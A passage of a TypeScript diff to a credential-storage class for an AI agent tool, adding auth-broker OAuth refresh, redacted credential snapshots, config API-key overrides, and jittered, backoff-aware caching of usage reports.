markCredentialSuspect?(credentialId: number, opts?: { signal?: AbortSignal }): Promise<void>; +} + // ───────────────────────────────────────────────────────────────────────────── // AuthStorage Options // ───────────────────────────────────────────────────────────────────────────── @@ -117,6 +239,42 @@ export type AuthStorageOptions = { * duplicate credentials (uninteresting hygiene). */ onCredentialDisabled?: (event: CredentialDisabledEvent) => void | Promise<void>; + /** + * Override OAuth refresh. When set, `AuthStorage` calls this instead of the + * per-provider local refresh function. Receives the credential id so the + * implementation can address remote credentials. + * + * Must return updated {@link OAuthCredentials} with at least `access` and + * `expires`. `refresh` may be an opaque sentinel (e.g. `"__remote__"`) when + * the actual refresh token never leaves the broker. + */ + refreshOAuthCredential?: ( + provider: Provider, + credentialId: number, + credential: OAuthCredential, + signal?: AbortSignal, + ) => Promise<OAuthCredentials>; + /** + * Human-readable description of the credential store backing this + * AuthStorage instance. Surfaced through {@link AuthStorage.describeCredentialSource} + * so the TUI can show where a token came from (broker URL or local SQLite path). + * + * Examples: + * - `"local ~/.omp/agent/agent.db"` + * - `"broker http://can.internal:8765"` + */ + sourceLabel?: string; + /** + * Override `fetchUsageReports`. When set, `AuthStorage.fetchUsageReports` + * calls this instead of fanning out per-credential. The primary use case is + * routing through a broker that egresses from a less-throttled IP — e.g. a + * residential laptop trips Anthropic's per-IP rate limit on the usage + * endpoint and drops 2-of-5 credentials, while the VPS broker gets all 5. + * + * Implementations may return null when no usage data is available; the + * AuthStorage caller surfaces that to its own consumer unchanged. + */ + fetchUsageReports?: (signal?: AbortSignal) => Promise<UsageReport[] | null>; }; // ───────────────────────────────────────────────────────────────────────────── @@ -151,8 +309,22 @@ const DEFAULT_USAGE_PROVIDER_MAP = new Map<Provider, UsageProvider>( ); const USAGE_CACHE_PREFIX = "usage_cache:"; -const USAGE_REPORT_TTL_MS = 30_000; -const DEFAULT_USAGE_REQUEST_TIMEOUT_MS = 3_000; +// 5 min stale tolerance. Anthropic / OpenAI rate-limit /usage hard at the IP +// level so we can't fetch all N credentials every cycle; with a long cache +// each credential's last-known value sticks visible while peers retry. UI +// data (5h / 7d / monthly limits) is fine being a few minutes stale. +const USAGE_REPORT_TTL_MS = 5 * 60_000; +const USAGE_LAST_GOOD_RETENTION_MS = 24 * 60 * 60_000; +/** + * Per-credential cool-down after a usage fetch fails. While this window is + * active we serve the last successful value to avoid dropping the credential + * from the report; without a previous value we just return null and retry + * on the next poll. + */ +const USAGE_FAILURE_BACKOFF_MS = 10_000; +// Bumped from 3s — Claude usage retries up to 3 times with exponential backoff +// (~3.5s total worst case); a tight per-request budget aborts retries mid-cycle. +const DEFAULT_USAGE_REQUEST_TIMEOUT_MS = 10_000; const DEFAULT_OAUTH_REFRESH_TIMEOUT_MS = 10_000; /** * Cap on the buffered credential_disabled backlog held while no handler is attached. @@ -168,6 +340,7 @@ type UsageCacheEntry<T> = { interface UsageCache { get<T>(key: string): UsageCacheEntry<T> | undefined; + getStale<T>(key: string): UsageCacheEntry<T> | undefined; set<T>(key: string, entry: UsageCacheEntry<T>): void; cleanup?(): void; } @@ -181,6 +354,12 @@ type UsageRequestDescriptor = { type AuthApiKeyOptions = { baseUrl?: string; modelId?: string; + /** + * Caller's cancel signal. Threaded into any broker-bound OAuth refresh so + * `ESC` / request abort actually kills a hung broker fetch instead of + * stranding the caller for `timeoutMs * (maxRetries + 1)`. + */ + signal?: AbortSignal; }; function requiresOpenAICodexProModel(provider: string, modelId: string | undefined): boolean { @@ -228,6 +407,77 @@ function parseUsageCacheEntry<T>(raw: string): UsageCacheEntry<T> | undefined { } } +/** + * Race `promise` against `signal`, rejecting only this caller when the signal + * fires. The underlying promise keeps running so other awaiters on the same + * single-flight fetch aren't punished by a peer's cancel. + */ +function raceUsageWithSignal<T>(promise: Promise<T>, signal: AbortSignal | undefined): Promise<T> { + if (!signal) return promise; + if (signal.aborted) return Promise.reject(new Error("usage fetch aborted")); + return new Promise<T>((resolve, reject) => { + const onAbort = (): void => { + signal.removeEventListener("abort", onAbort); + reject(new Error("usage fetch aborted")); + }; + signal.addEventListener("abort", onAbort, { once: true }); + promise.then( + value => { + signal.removeEventListener("abort", onAbort); + resolve(value); + }, + err => { + signal.removeEventListener("abort", onAbort); + reject(err); + }, + ); + }); +} + +function raceCredentialRefreshWithSignal<T>( + promise: Promise<T>, + signal: AbortSignal | undefined, + message = "credential refresh aborted", +): Promise<T> { + if (!signal) return promise; + if (signal.aborted) return Promise.reject(new Error(message)); + const abort = Promise.withResolvers<never>(); + const onAbort = (): void => abort.reject(new Error(message)); + signal.addEventListener("abort", onAbort, { once: true }); + return Promise.race([promise, abort.promise]).finally(() => { + signal.removeEventListener("abort", onAbort); + }); +} + +function authCredentialEquals(left: AuthCredential, right: AuthCredential): boolean { + if (left.type !== right.type) return false; + if (left.type === "api_key") { + return right.type === "api_key" && left.key === right.key; + } + if (right.type !== "oauth") return false; + return ( + left.access === right.access && + left.refresh === right.refresh && + left.expires === right.expires && + left.accountId === right.accountId && + left.email === right.email && + left.projectId === right.projectId && + left.enterpriseUrl === right.enterpriseUrl + ); +} + +function storedCredentialArraysEqual(left: StoredCredential[], right: StoredCredential[]): boolean { + if (left.length !== right.length) return false; + for (let index = 0; index < left.length; index += 1) { + const leftEntry = left[index]; + const rightEntry = right[index]; + if (!leftEntry || !rightEntry) return false; + if (leftEntry.id !== rightEntry.id) return false; + if (!authCredentialEquals(leftEntry.credential, rightEntry.credential)) return false; + } + return true; +} + // ───────────────────────────────────────────────────────────────────────────── // Usage Cache (backed by AuthCredentialStore) // ───────────────────────────────────────────────────────────────────────────── @@ -241,9 +491,17 @@ class AuthStorageUsageCache implements UsageCache { return parseUsageCacheEntry<T>(raw); } + getStale<T>(key: string): UsageCacheEntry<T> | undefined { + const raw = this.store.getCache(`${USAGE_CACHE_PREFIX}${key}`, { includeExpired: true }); + if (!raw) return undefined; + return parseUsageCacheEntry<T>(raw); + } + set<T>(key: string, entry: UsageCacheEntry<T>): void { const payload = JSON.stringify({ value: entry.value, expiresAt: entry.expiresAt }); - this.store.setCache(`${USAGE_CACHE_PREFIX}${key}`, payload, Math.floor(entry.expiresAt / 1000)); + const durableExpiresAt = + entry.value === null ? entry.expiresAt : Math.max(entry.expiresAt, Date.now() + USAGE_LAST_GOOD_RETENTION_MS); + this.store.setCache(`${USAGE_CACHE_PREFIX}${key}`, payload, Math.floor(durableExpiresAt / 1000)); } cleanup(): void { @@ -272,6 +530,7 @@ export class AuthStorage { /** Provider -> credentials cache, populated from store on reload(). */ #data: Map<string, StoredCredential[]> = new Map(); #runtimeOverrides: Map<string, string> = new Map(); + #configOverrides: Map<string, string> = new Map(); /** Tracks next credential index per provider:type key for round-robin distribution (non-session use). */ #providerRoundRobinIndex: Map<string, number> = new Map(); /** Tracks the last used credential per provider for a session (used for rate-limit switching). */ @@ -282,13 +541,16 @@ export class AuthStorage { #rankingStrategyResolver?: (provider: Provider) => CredentialRankingStrategy | undefined; #usageCache: UsageCache; #usageRequestInFlight: Map<string, Promise<UsageReport | null>> = new Map(); - #usageReportsInFlight: Map<string, Promise<UsageReport[]>> = new Map(); + #usageReportsInFlight: Map<string, Promise<UsageReport[] | null>> = new Map(); #usageFetch: typeof fetch; #usageRequestTimeoutMs: number; #usageLogger?: UsageLogger; #fallbackResolver?: (provider: string) => string | undefined; #store: AuthCredentialStore; #configValueResolver: (config: string) => Promise<string | undefined>; + #refreshOAuthCredentialOverride?: AuthStorageOptions["refreshOAuthCredential"]; + #fetchUsageReportsOverride?: AuthStorageOptions["fetchUsageReports"]; + #sourceLabel?: string; #credentialDisabledListeners: Set<(event: CredentialDisabledEvent) => void | Promise<void>> = new Set(); /** * Buffer for credential_disabled events fired while no listener is subscribed. @@ -299,6 +561,9 @@ export class AuthStorage { * but a process that runs without subscribers for a long time shouldn't grow this unboundedly). */ #pendingDisabledEvents: CredentialDisabledEvent[] = []; + #generation = 1; + #generationListeners: Set<(generation: number) => void> = new Set(); + #oauthRefreshInFlight: Map<number, Promise<AuthCredentialSnapshotEntry>> = new Map(); #closed = false; constructor(store: AuthCredentialStore, options: AuthStorageOptions = {}) { @@ -309,6 +574,9 @@ export class AuthStorage { this.#usageCache = new AuthStorageUsageCache(this.#store); this.#usageFetch = options.usageFetch ?? fetch; this.#usageRequestTimeoutMs = options.usageRequestTimeoutMs ?? DEFAULT_USAGE_REQUEST_TIMEOUT_MS; + this.#refreshOAuthCredentialOverride = options.refreshOAuthCredential; + this.#fetchUsageReportsOverride = options.fetchUsageReports; + this.#sourceLabel = options.sourceLabel; if (options.onCredentialDisabled) { // Constructor-registered subscribers are permanent for this AuthStorage's lifetime; // the unsubscribe handle is intentionally discarded. @@ -328,7 +596,7 @@ export class AuthStorage { * @param dbPath - Path to SQLite database */ static async create(dbPath: string, options: AuthStorageOptions = {}): Promise<AuthStorage> { - const store = await AuthCredentialStore.open(dbPath); + const store = await SqliteAuthCredentialStore.open(dbPath); return new AuthStorage(store, options); } @@ -343,6 +611,32 @@ export class AuthStorage { this.#store.close(); } + getGeneration(): number { + return this.#generation; + } + + onGenerationChanged(listener: (generation: number) => void): () => void { + this.#generationListeners.add(listener); + return () => { + this.#generationListeners.delete(listener); + }; + } + + offGenerationChanged(listener: (generation: number) => void): void { + this.#generationListeners.delete(listener); + } + + #bumpGeneration(reason: string): void { + this.#generation += 1; + for (const listener of [...this.#generationListeners]) { + try { + listener(this.#generation); + } catch (error) { + logger.debug("AuthStorage generation listener failed", { reason, error: String(error) }); + } + } + } + /** * Subscribe to {@link CredentialDisabledEvent}s. Multiple subscribers are supported and * each fires for every disable event; subscribers are invoked in registration order with @@ -391,6 +685,35 @@ export class AuthStorage { this.#runtimeOverrides.delete(provider); } + /** + * Register a per-provider API key sourced from user configuration + * (e.g. `models.yml` `providers.<name>.apiKey`). Higher priority than + * stored credentials and OAuth tokens — when the user pins a key in + * config, that key is what authenticates outbound requests, regardless + * of whatever the broker happens to have loaded for that provider. + * + * Lower priority than {@link setRuntimeApiKey} so a CLI `--api-key` + * still wins for the duration of a single invocation. + */ + setConfigApiKey(provider: string, apiKey: string): void { + this.#configOverrides.set(provider, apiKey); + } + + /** + * Remove a single config-sourced API key override. + */ + removeConfigApiKey(provider: string): void { + this.#configOverrides.delete(provider); + } + + /** + * Drop every config-sourced API key. Called by `ModelRegistry` before + * re-parsing `models.yml` so removed entries actually disappear. + */ + clearConfigApiKeys(): void { + this.#configOverrides.clear(); + } + /** * Set a fallback resolver for API keys not found in storage or env vars. * Used for custom provider keys from models.json. @@ -418,7 +741,15 @@ export class AuthStorage { dedupedGrouped.set(provider, deduped); } } - this.#data = dedupedGrouped; + + const removedProviders = new Set(this.#data.keys()); + for (const [provider, entries] of dedupedGrouped) { + this.#setStoredCredentials(provider, entries); + removedProviders.delete(provider); + } + for (const provider of removedProviders) { + this.#setStoredCredentials(provider, []); + } } /** @@ -437,11 +768,14 @@ export class AuthStorage { * @param credentials - Array of stored credentials to cache */ #setStoredCredentials(provider: string, credentials: StoredCredential[]): void { + const current = this.#data.get(provider) ?? []; + if (storedCredentialArraysEqual(current, credentials)) return; if (credentials.length === 0) { this.#data.delete(provider); } else { this.#data.set(provider, credentials); } + this.#bumpGeneration("credentials"); } #resolveOAuthDedupeIdentityKey(provider: string, credential: OAuthCredential): string | null { @@ -764,7 +1098,7 @@ export class AuthStorage { */ async remove(provider: string): Promise<void> { this.#store.deleteAuthCredentialsForProvider(provider, "deleted by user"); - this.#data.delete(provider); + this.#setStoredCredentials(provider, []); this.#resetProviderAssignments(provider); } @@ -788,6 +1122,7 @@ export class AuthStorage { */ hasAuth(provider: string): boolean { if (this.#runtimeOverrides.has(provider)) return true; + if (this.#configOverrides.has(provider)) return true; if (this.#getCredentialsForProvider(provider).length > 0) return true; if (getEnvApiKey(provider)) return true; if (this.#fallbackResolver?.(provider)) return true; @@ -822,8 +1157,9 @@ export class AuthStorage { const oauthCredentials = allCredentials.filter((c): c is OAuthCredential => c.type === "oauth"); if (oauthCredentials.length === 0) return undefined; - // Runtime override always returns before recording a session credential. - if (this.#runtimeOverrides.has(provider)) return undefined; + // Runtime / config overrides bypass OAuth account_uuid attribution — the + // caller is authenticating with an explicit key, not the broker's OAuth. + if (this.#runtimeOverrides.has(provider) || this.#configOverrides.has(provider)) return undefined; // Prefer the session-sticky credential when available. const sessionPref = this.#getSessionCredential(provider, sessionId); @@ -1264,6 +1600,26 @@ export class AuthStorage { }; } + /** + * Find the stored credential id matching a {@link UsageCredential} so the + * refresh override can address the row. Mirrors the matching logic in + * {@link AuthStorage.#persistRefreshedUsageCredential}. + */ + #findStoredCredentialIdForUsageCredential(provider: Provider, previous: UsageCredential): number | undefined { + const entries = this.#getStoredCredentials(provider); + const match = entries.find(entry => { + if (entry.credential.type !== "oauth") return false; + if (previous.refreshToken && entry.credential.refresh === previous.refreshToken) return true; + if (previous.accessToken && entry.credential.access === previous.accessToken) return true; + return ( + entry.credential.accountId === previous.accountId && + entry.credential.email === previous.email && + entry.credential.projectId === previous.projectId + ); + }); + return match?.id; + } + #persistRefreshedUsageCredential(provider: Provider, previous: UsageCredential, next: UsageCredential): void { const entries = this.#getStoredCredentials(provider); const index = entries.findIndex(entry => { @@ -1312,7 +1668,16 @@ export class AuthStorage { const refreshableCredential = this.#buildRefreshableOauthCredential(request.credential); if (refreshableCredential) { try { - const refreshed = await this.#refreshOAuthCredential(request.provider, refreshableCredential); + const refreshableCredentialId = this.#findStoredCredentialIdForUsageCredential( + request.provider, + request.credential, + ); + const refreshed = await this.#refreshOAuthCredential( + request.provider, + refreshableCredential, + refreshableCredentialId, + timeoutSignal, + ); const refreshedCredential = this.#mergeRefreshedUsageCredential(request.credential, refreshed); this.#persistRefreshedUsageCredential(request.provider, request.credential, refreshedCredential); params = { @@ -1348,6 +1713,7 @@ export class AuthStorage { const cacheKey = this.#buildUsageReportCacheKey(request); const now = Date.now(); const cached = this.#usageCache.get<UsageReport | null>(cacheKey); + // Fresh cache hit: return whatever's there (success or null fallback). if (cached && cached.expiresAt > now) { return cached.value; } @@ -1357,11 +1723,27 @@ export class AuthStorage { const promise = (async () => { const report = await this.#fetchUsageUncached(request, timeoutMs); + const ttlJitter = USAGE_REPORT_TTL_MS * (Math.random() * 0.5 - 0.25); if (report !== null) { - this.#usageCache.set(cacheKey, { value: report, expiresAt: Date.now() + USAGE_REPORT_TTL_MS }); + // Success: stagger per-credential cache expiry so all accounts don't + // refresh in the same window — Anthropic / OpenAI rate-limit `/usage` + // per source IP regardless of account, and synchronized 5-credential + // fan-out trips 429s every cycle. With ±25% jitter on TTL the refresh + // times decorrelate within a few cycles. + this.#usageCache.set(cacheKey, { value: report, expiresAt: Date.now() + USAGE_REPORT_TTL_MS + ttlJitter }); return report; } - return cached?.value ?? null; + // Failure: cache the LAST GOOD value (if any) with a short jittered TTL + // so the credential cools down briefly without dropping out of the + // report. If we never had a good value, return null this cycle and + // don't write — let the next poll retry. + const lastGood = this.#usageCache.getStale<UsageReport | null>(cacheKey)?.value ?? null; + if (lastGood !== null) { + const backoffJitter = USAGE_FAILURE_BACKOFF_MS * (Math.random() * 0.5 - 0.25); + const coolDown = Date.now() + USAGE_FAILURE_BACKOFF_MS + backoffJitter; + this.#usageCache.set(cacheKey, { value: lastGood, expiresAt: coolDown }); + } + return lastGood; })().finally(() => { this.#usageRequestInFlight.delete(cacheKey); }); @@ -1563,8 +1945,16 @@ export class AuthStorage { async #getUsageReport( provider: Provider, credential: OAuthCredential, - options?: { baseUrl?: string; timeoutMs?: number }, + options?: { baseUrl?: string; timeoutMs?: number; signal?: AbortSignal }, ): Promise<UsageReport | null> { + // Store-level hook (e.g. `RemoteAuthCredentialStore`) is authoritative + // when present: the broker already aggregates usage from a less-throttled + // IP, and falling back to the local per-credential fetch would defeat the + // whole point of routing through it. + const storeHook = this.#store.getUsageReport?.bind(this.#store); + if (storeHook) { + return storeHook(provider, credential, options?.signal); + } return this.#fetchUsageCached( this.#buildUsageRequestForOauth(provider, credential, options?.baseUrl), options?.timeoutMs ?? this.#usageRequestTimeoutMs, @@ -1573,7 +1963,31 @@ export class AuthStorage { async fetchUsageReports(options?: { baseUrlResolver?: (provider: Provider) => string | undefined; + /** Caller's cancel signal; only rejects this caller, never the shared upstream fetch. */ + signal?: AbortSignal; }): Promise<UsageReport[] | null> { + // Caller override > store-level hook > local per-credential fan-out. + // `RemoteAuthCredentialStore` implements the store hook so a gateway + // backed by a broker automatically routes usage to the broker without + // needing the caller to wire it explicitly. + const override = this.#fetchUsageReportsOverride ?? this.#store.fetchUsageReports?.bind(this.#store); + if (override) { + // Reuse the in-flight map so concurrent callers (widget poll + format + // dispatch + credential selection) coalesce into one upstream call. + // Each caller's `signal` only cancels THAT caller's await; the + // shared upstream fetch runs to completion so peers aren't punished. + const OVERRIDE_KEY = "__override__"; + let shared = this.#usageReportsInFlight.get(OVERRIDE_KEY); + if (!shared) { + // Don't forward the caller signal into the shared fetch — first caller's + // abort would otherwise cancel the upstream for every peer. + shared = override().finally(() => { + this.#usageReportsInFlight.delete(OVERRIDE_KEY); + }); + this.#usageReportsInFlight.set(OVERRIDE_KEY, shared); + } + return raceUsageWithSignal(shared, options?.signal); + } if (!this.#usageProviderResolver) return null; const requests = this.#collectUsageRequests(options); @@ -1583,12 +1997,12 @@ export class AuthStorage { providers: [...new Set(requests.map(request => request.provider))].sort(), }); + // Per-credential caching with jitter lives in #fetchUsageCached, so we + // don't store the aggregated result here — doing so locks the widget to + // a single decorrelation snapshot for 30s, defeating the jitter (some + // accounts can be missing from one fetch and present in the next; the + // aggregate cache freezes whichever set landed first). const cacheKey = this.#buildUsageReportsCacheKey(requests); - const now = Date.now(); - const cached = this.#usageCache.get<UsageReport[]>(cacheKey); - if (cached && cached.expiresAt > now) { - return cached.value; - } const inFlight = this.#usageReportsInFlight.get(cacheKey); if (inFlight) return inFlight; @@ -1609,10 +2023,8 @@ export class AuthStorage { ); const reports = results.filter((report): report is UsageReport => report !== null); const deduped = this.#dedupeUsageReports(reports); - if (deduped.length > 0) { - this.#usageCache.set(cacheKey, { value: deduped, expiresAt: Date.now() + USAGE_REPORT_TTL_MS }); - } - const resolved = deduped.length > 0 ? deduped : (cached?.value ?? []); + // no outer cache write — see comment above. + const resolved = deduped; this.#usageLogger?.debug("Usage fetch resolved", { reports: resolved.map(report => { const accountLabel = @@ -1646,7 +2058,7 @@ export class AuthStorage { async markUsageLimitReached( provider: string, sessionId: string | undefined, - options?: { retryAfterMs?: number; baseUrl?: string }, + options?: { retryAfterMs?: number; baseUrl?: string; signal?: AbortSignal }, ): Promise<boolean> { const sessionCredential = this.#getSessionCredential(provider, sessionId); if (!sessionCredential) return false; @@ -1749,8 +2161,12 @@ export class AuthStorage { primaryDrainRate: number; orderPos: number; }> = []; - // Pre-fetch usage reports in parallel for non-blocked credentials - const usageResults = await Promise.all( + // Pre-fetch usage reports in parallel for non-blocked credentials. + // Wrap with a timeout so slow/429'd fetches don't indefinitely block + // credential selection — better to pick a credential without usage data + // than to hang the agent waiting for rate-limited usage endpoints. + const usageTimeout = Math.max(5000, this.#usageRequestTimeoutMs * 1.5); + const usagePromise = Promise.all( args.order.map(async idx => { const selection = args.credentials[idx]; if (!selection) return null; @@ -1763,6 +2179,23 @@ export class AuthStorage { return { selection, usage, usageChecked: true, blockedUntil: undefined as number | undefined }; }), ); + const timeoutSignal = Promise.withResolvers<null>(); + // `Bun.sleep` keeps the event loop alive even after Promise.race resolves, + // which leaks a 7.5–15s timer per credential-selection call. Use an unref'd + // timer so the timeout doesn't pin the process and clear it on the happy + // path so memory drops immediately. + const timer = setTimeout(() => timeoutSignal.resolve(null), usageTimeout); + timer.unref?.(); + const usageResults = await Promise.race([usagePromise, timeoutSignal.promise]).then(result => { + clearTimeout(timer); + return ( + result ?? + args.order.map(idx => { + const selection = args.credentials[idx]; + return selection ? { selection, usage: null, usageChecked: false, blockedUntil: undefined } : null; + }) + ); + }); for (let orderPos = 0; orderPos < usageResults.length; orderPos += 1) { const result = usageResults[orderPos]; @@ -1883,9 +2316,12 @@ export class AuthStorage { return; } try { + const credentialId = this.#getStoredCredentials(provider)[candidate.selection.index]?.id; const refreshedCredentials = await this.#refreshOAuthCredential( provider, candidate.selection.credential, + credentialId, + options?.signal, ); candidate.selection.credential = { ...candidate.selection.credential, @@ -1927,33 +2363,85 @@ export class AuthStorage { return undefined; } - async #refreshOAuthCredential(provider: Provider, credential: OAuthCredential): Promise<OAuthCredentials> { + async #refreshOAuthCredential( + provider: Provider, + credential: OAuthCredential, + credentialId: number | undefined, + signal?: AbortSignal, + ): Promise<OAuthCredentials> { if (Date.now() < credential.expires) return credential; - const customProvider = getOAuthProvider(provider); let refreshPromise: Promise<OAuthCredentials>; - if (customProvider) { - if (!customProvider.refreshToken) { - throw new Error(`OAuth provider "${provider}" does not support token refresh`); - } - refreshPromise = customProvider.refreshToken(credential); + // Caller override > store-level hook > local per-provider refresh. + // `RemoteAuthCredentialStore` exposes the hook so a broker-backed gateway + // routes refresh through the broker without explicit wiring. + const storeRefresh = this.#store.refreshOAuthCredential?.bind(this.#store); + const overrideRefresh = this.#refreshOAuthCredentialOverride ?? storeRefresh; + if (overrideRefresh && credentialId !== undefined) { + refreshPromise = overrideRefresh(provider, credentialId, credential, signal); } else { - refreshPromise = refreshOAuthToken(provider as OAuthProvider, credential); + const customProvider = getOAuthProvider(provider); + if (customProvider) { + if (!customProvider.refreshToken) { + throw new Error(`OAuth provider "${provider}" does not support token refresh`); + } + refreshPromise = customProvider.refreshToken(credential); + } else { + refreshPromise = refreshOAuthToken(provider as OAuthProvider, credential); + } } // Bound the refresh so a slow/hanging token endpoint cannot stall credential selection. + // Caller-driven abort jumps the gun on the timeout — the agent's ESC must + // take priority over the floor timeout. let timeout: NodeJS.Timeout | undefined; - const timeoutPromise = new Promise<never>((_, reject) => { - timeout = setTimeout( - () => reject(new Error(`OAuth token refresh timed out for provider: ${provider}`)), - DEFAULT_OAUTH_REFRESH_TIMEOUT_MS, - ); - }); + let onAbort: (() => void) | undefined; + const cancellation = Promise.withResolvers<never>(); + timeout = setTimeout( + () => cancellation.reject(new Error(`OAuth token refresh timed out for provider: ${provider}`)), + DEFAULT_OAUTH_REFRESH_TIMEOUT_MS, + ); + if (signal) { + if (signal.aborted) { + cancellation.reject(new Error("OAuth token refresh aborted by caller")); + } else { + onAbort = () => cancellation.reject(new Error("OAuth token refresh aborted by caller")); + signal.addEventListener("abort", onAbort, { once: true }); + } + } try { - return await Promise.race([refreshPromise, timeoutPromise]); + return await Promise.race([refreshPromise, cancellation.promise]); } finally { if (timeout) clearTimeout(timeout); + if (signal && onAbort) signal.removeEventListener("abort", onAbort); } } + async #prepareOAuthCredentialForRequest( + provider: string, + selection: { credential: OAuthCredential; index: number }, + options: AuthApiKeyOptions | undefined, + ): Promise<boolean> { + const prepare = this.#store.prepareForRequest?.bind(this.#store); + if (!prepare) return true; + const stored = this.#getStoredCredentials(provider); + const selected = stored[selection.index]; + if (!selected || selected.credential.type !== "oauth") return false; + + const prepared = await prepare(selected.id, { signal: options?.signal }); + if (!prepared) return true; + const latestRows = this.#store.listAuthCredentials(provider); + this.#setStoredCredentials( + provider, + latestRows.map(row => ({ id: row.id, credential: row.credential })), + ); + const latestIndex = latestRows.findIndex(row => row.id === selected.id); + if (latestIndex === -1) return false; + const latest = latestRows[latestIndex]; + if (!latest || latest.credential.type !== "oauth") return false; + selection.index = latestIndex; + selection.credential = latest.credential; + return true; + } + /** Attempts to use a single OAuth credential, checking usage and refreshing token. */ async #tryOAuthCredential( provider: Provider, @@ -1980,6 +2468,10 @@ export class AuthStorage { return undefined; } + if (!(await this.#prepareOAuthCredentialForRequest(provider, selection, options))) { + return undefined; + } + const requiresProModel = requiresOpenAICodexProModel(provider, options?.modelId); const applyProFilter = enforceProRequirement ?? requiresProModel; let usage: UsageReport | null = null; @@ -2014,7 +2506,12 @@ export class AuthStorage { let result: { newCredentials: OAuthCredentials; apiKey: string } | null; const customProvider = getOAuthProvider(provider); if (customProvider) { - const refreshedCredentials = await this.#refreshOAuthCredential(provider, selection.credential); + const refreshedCredentials = await this.#refreshOAuthCredential( + provider, + selection.credential, + this.#getStoredCredentials(provider)[selection.index]?.id, + options?.signal, + ); const apiKey = customProvider.getApiKey ? customProvider.getApiKey(refreshedCredentials) : refreshedCredentials.access; @@ -2140,6 +2637,11 @@ export class AuthStorage { return runtimeKey; } + const configKey = this.#configOverrides.get(provider); + if (configKey) { + return configKey; + } + const apiKeySelection = this.#selectCredentialByType(provider, "api_key"); if (apiKeySelection) { return this.#configValueResolver(apiKeySelection.credential.key); @@ -2170,10 +2672,11 @@ export class AuthStorage { * Get API key for a provider. * Priority: * 1. Runtime override (CLI --api-key) - * 2. API key from storage - * 3. OAuth token from storage (auto-refreshed) - * 4. Environment variable - * 5. Fallback resolver (models.json custom providers) + * 2. Config override (models.yml `providers.<name>.apiKey`) + * 3. API key from storage + * 4. OAuth token from storage (auto-refreshed) + * 5. Environment variable + * 6. Fallback resolver (models.yml custom providers, last-resort) */ async getApiKey(provider: string, sessionId?: string, options?: AuthApiKeyOptions): Promise<string | undefined> { // Runtime override takes highest priority @@ -2182,6 +2685,16 @@ export class AuthStorage { return runtimeKey; } + // Config override: explicit apiKey pinned in models.yml beats the broker's + // OAuth credentials. The user redirected a provider at a custom baseUrl + // (e.g. an auth-gateway) and supplied the bearer for that endpoint — + // honor it instead of forwarding an upstream OAuth token that the proxy + // won't accept. + const configKey = this.#configOverrides.get(provider); + if (configKey) { + return configKey; + } + const apiKeySelection = this.#selectCredentialByType(provider, "api_key", sessionId); if (apiKeySelection) { this.#recordSessionCredential(provider, sessionId, "api_key", apiKeySelection.index); @@ -2204,10 +2717,252 @@ export class AuthStorage { // Fall back to custom resolver (e.g., models.json custom providers) return this.#fallbackResolver?.(provider) ?? undefined; } + + #extractStructuredApiKeyToken(apiKey: string): string | undefined { + if (!apiKey.startsWith("{")) return undefined; + try { + const parsed = JSON.parse(apiKey) as { token?: unknown }; + return typeof parsed.token === "string" ? parsed.token : undefined; + } catch { + return undefined; + } + } + + async #credentialMatchesApiKey(credential: AuthCredential, apiKey: string): Promise<boolean> { + if (credential.type === "api_key") { + return (await this.#configValueResolver(credential.key)) === apiKey; + } + if (credential.access === apiKey) return true; + return this.#extractStructuredApiKeyToken(apiKey) === credential.access; + } + + async invalidateCredentialMatching(provider: string, apiKey: string, signal?: AbortSignal): Promise<boolean> { + const stored = this.#getStoredCredentials(provider); + let matchedId: number | undefined; + for (const entry of stored) { + if (await this.#credentialMatchesApiKey(entry.credential, apiKey)) { + matchedId = entry.id; + break; + } + } + + if (matchedId === undefined) { + await this.reload(); + return false; + } + + const markSuspect = this.#store.markCredentialSuspect?.bind(this.#store); + if (markSuspect) { + await markSuspect(matchedId, { signal }); + } else { + await this.reload(); + } + + const latestRows = this.#store.listAuthCredentials(provider); + this.#setStoredCredentials( + provider, + latestRows.map(row => ({ id: row.id, credential: row.credential })), + ); + return true; + } + + // ─── Auth Broker integration ──────────────────────────────────────────── + + /** + * Build a redacted snapshot of all loaded credentials for the auth-broker + * wire. OAuth refresh tokens are replaced with {@link REMOTE_REFRESH_SENTINEL} + * so clients never see the actual refresh token. + * + * Callers must {@link AuthStorage.reload} first when serving a stale snapshot + * (the broker server's HTTP handler does this). + */ + exportSnapshot(): AuthCredentialSnapshot { + const entries: AuthCredentialSnapshotEntry[] = []; + for (const [provider, stored] of this.#data) { + for (const entry of stored) { + const credential = entry.credential; + const redacted: SnapshotCredential = + credential.type === "api_key" ? credential : { ...credential, refresh: REMOTE_REFRESH_SENTINEL }; + entries.push({ + id: entry.id, + provider, + credential: redacted, + identityKey: resolveCredentialIdentityKey(provider, credential), + }); + } + } + return { generation: this.#generation, generatedAt: Date.now(), credentials: entries }; + } + + /** + * Refresh the OAuth credential with the given id through a per-credential + * single-flight. Concurrent callers for the same row await the same upstream + * refresh attempt, which is required for providers that rotate refresh tokens + * on every successful refresh. + */ + async refreshCredentialById(id: number, signal?: AbortSignal): Promise<AuthCredentialSnapshotEntry> { + const existing = this.#oauthRefreshInFlight.get(id); + if (existing) return raceCredentialRefreshWithSignal(existing, signal); + + const promise = (async () => { + this.#bumpGeneration("credential-refresh-start"); + try { + return await this.#forceRefreshCredentialByIdUnshared(id, signal); + } catch (error) { + this.#bumpGeneration("credential-refresh-failure"); + throw error; + } finally { + this.#oauthRefreshInFlight.delete(id); + } + })(); + this.#oauthRefreshInFlight.set(id, promise); + return raceCredentialRefreshWithSignal(promise, signal); + } + + /** + * Force-refresh the OAuth credential with the given id, bypassing the + * not-yet-expired guard. Used by the auth-broker server to honour + * `POST /v1/credential/:id/refresh`. + * + * Returns the redacted snapshot entry for the refreshed row. + * Throws when no OAuth credential with that id is loaded. + */ + async forceRefreshCredentialById(id: number, signal?: AbortSignal): Promise<AuthCredentialSnapshotEntry> { + return this.refreshCredentialById(id, signal); + } + + async #forceRefreshCredentialByIdUnshared(id: number, signal?: AbortSignal): Promise<AuthCredentialSnapshotEntry> { + for (const [provider, entries] of this.#data) { + const index = entries.findIndex(entry => entry.id === id); + if (index === -1) continue; + const target = entries[index]; + if (target.credential.type !== "oauth") { + throw new Error(`Credential ${id} is not OAuth (provider=${provider}, type=${target.credential.type})`); + } + // Pass a clone with expires=0 so the cached not-yet-expired short-circuit + // in #refreshOAuthCredential doesn't suppress the requested refresh. + const stale: OAuthCredential = { ...target.credential, expires: 0 }; + const refreshed = await this.#refreshOAuthCredential(provider as Provider, stale, id, signal); + const updated: OAuthCredential = { + type: "oauth", + access: refreshed.access, + refresh: refreshed.refresh, + expires: refreshed.expires, + accountId: refreshed.accountId ?? target.credential.accountId, + 